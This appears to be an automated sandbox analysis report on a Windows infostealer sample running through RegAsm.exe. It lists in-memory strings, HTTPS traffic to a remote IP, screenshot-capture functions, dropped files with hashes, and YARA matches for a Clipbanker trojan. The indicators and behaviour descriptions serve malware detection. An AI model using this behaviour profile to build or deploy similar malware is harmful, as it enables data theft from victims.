Source: RegAsm.exe, 00000002.00000002.2397373847.00000000273A1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2378894358.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, DAEBFHJKJEBFCBFHDAEG.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2397373847.00000000273A1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2378894358.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, DAEBFHJKJEBFCBFHDAEG.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: DBKEHDGD.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DBKEHDGD.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DBKEHDGD.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DAEBFHJKJEBFCBFHDAEG.2.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: https://mozilla.org0/
Source: HJJDGHCBGD.exe, 00000008.00000003.2377160146.000000000284E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, oobeldr.exe.8.dr, HJJDGHCBGD.exe.2.dr String found in binary or memory: https://sectigo.com/CPS0
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://support.mozilla.org
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: RegAsm.exe, 00000002.00000002.2397373847.00000000273A1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2378894358.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, DAEBFHJKJEBFCBFHDAEG.2.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: DBKEHDGD.2.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2397373847.00000000273A1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2378894358.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, DAEBFHJKJEBFCBFHDAEG.2.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: DBKEHDGD.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2377548003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2377548003.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/xsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZu
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2377548003.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/-
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2377548003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2377548003.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: JJKJDAEBFCBKECBGDBFCFBKKKF.2.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: RegAsm.exe, 00000002.00000002.2377548003.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 186.64.114.115:443 -> 192.168.2.4:49734 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_00418AB0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 8.2.HJJDGHCBGD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.HJJDGHCBGD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2910452418.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2910452418.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.2379318946.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.2379318946.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
.NET source code contains very large array initializations
Source: file.exe, EVQ36EGFCMmATuYexf.cs Large array initialization: EVQ36EGFCMmATuYexf: array initializer size 192000
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 2_2_6C2FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C33B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33B8C0 rand_s,NtQueryVirtualMemory, 2_2_6C33B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 2_2_6C33B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 2_2_6C2DF280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02B80CD8 0_2_02B80CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2D35A0 2_2_6C2D35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C34542B 2_2_6C34542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C315C10 2_2_6C315C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C322C10 2_2_6C322C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C34AC00 2_2_6C34AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C34545C 2_2_6C34545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E5440 2_2_6C2E5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3334A0 2_2_6C3334A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33C4A0 2_2_6C33C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E6C80 2_2_6C2E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C316CF0 2_2_6C316CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DD4E0 2_2_6C2DD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E64C0 2_2_6C2E64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FD4D0 2_2_6C2FD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C300512 2_2_6C300512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2EFD00 2_2_6C2EFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FED10 2_2_6C2FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3385F0 2_2_6C3385F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C310DD0 2_2_6C310DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C339E30 2_2_6C339E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C317E10 2_2_6C317E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C325600 2_2_6C325600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C346E63 2_2_6C346E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DC670 2_2_6C2DC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C313E50 2_2_6C313E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F4640 2_2_6C2F4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C322E4E 2_2_6C322E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F9E50 2_2_6C2F9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C334EA0 2_2_6C334EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C33E680 2_2_6C33E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F5E90 2_2_6C2F5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3476E3 2_2_6C3476E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DBEF0 2_2_6C2DBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2EFEF0 2_2_6C2EFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C317710 2_2_6C317710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E9F00 2_2_6C2E9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3277A0 2_2_6C3277A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C306FF0 2_2_6C306FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DDFE0 2_2_6C2DDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C31B820 2_2_6C31B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C324820 2_2_6C324820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2E7810 2_2_6C2E7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C31F070 2_2_6C31F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F8850 2_2_6C2F8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FD850 2_2_6C2FD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3060A0 2_2_6C3060A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FC0E0 2_2_6C2FC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3158E0 2_2_6C3158E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3450C7 2_2_6C3450C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C32B970 2_2_6C32B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C34B170 2_2_6C34B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2ED960 2_2_6C2ED960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2FA940 2_2_6C2FA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C30D9B0 2_2_6C30D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DC9A0 2_2_6C2DC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C315190 2_2_6C315190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C332990 2_2_6C332990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C319A60 2_2_6C319A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C342AB0 2_2_6C342AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2D22A0 2_2_6C2D22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C304AA0 2_2_6C304AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2ECAB0 2_2_6C2ECAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C34BA90 2_2_6C34BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C31E2F0 2_2_6C31E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F1AF0 2_2_6C2F1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C318AC0 2_2_6C318AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C31D320 2_2_6C31D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2EC370 2_2_6C2EC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2D5340 2_2_6C2D5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2DF380 2_2_6C2DF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3453C8 2_2_6C3453C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C446C00 2_2_6C446C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C38AC60 2_2_6C38AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C45AC30 2_2_6C45AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3DECD0 2_2_6C3DECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C37ECC0 2_2_6C37ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4AAD50 2_2_6C4AAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C44ED70 2_2_6C44ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C508D20 2_2_6C508D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C384DB0 2_2_6C384DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C50CDC0 2_2_6C50CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C416D90 2_2_6C416D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C41EE70 2_2_6C41EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C460E20 2_2_6C460E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C420EC0 2_2_6C420EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C406E90 2_2_6C406E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C38AEC0 2_2_6C38AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C386F10 2_2_6C386F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C442F70 2_2_6C442F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4C0F20 2_2_6C4C0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3EEF40 2_2_6C3EEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C38EFB0 2_2_6C38EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C45EFF0 2_2_6C45EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C380FE0 2_2_6C380FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4C8FB0 2_2_6C4C8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C454840 2_2_6C454840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3D0820 2_2_6C3D0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C40A820 2_2_6C40A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4868E0 2_2_6C4868E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3D6900 2_2_6C3D6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3B8960 2_2_6C3B8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C49C9E0 2_2_6C49C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3B49F0 2_2_6C3B49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4109A0 2_2_6C4109A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C43A9A0 2_2_6C43A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C4409B0 2_2_6C4409B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C42EA00 2_2_6C42EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3FCA70 2_2_6C3FCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C438A30 2_2_6C438A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3FEA80 2_2_6C3FEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C388BAC 2_2_6C388BAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C486BE0 2_2_6C486BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C420BA0 2_2_6C420BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C3E4420 2_2_6C3E4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C398460 2_2_6C398460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C40A430 2_2_6C40A430
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\HJJDGHCBGD.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C50DAE0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00404610 appears 316 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C30CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C3194D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C5009D0 appears 121 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.1662990474.0000000000A64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVQP.exe` vs file.exe
Source: file.exe, 00000000.00000002.1666020082.00000000010FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameVQP.exe` vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 8.2.HJJDGHCBGD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.HJJDGHCBGD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
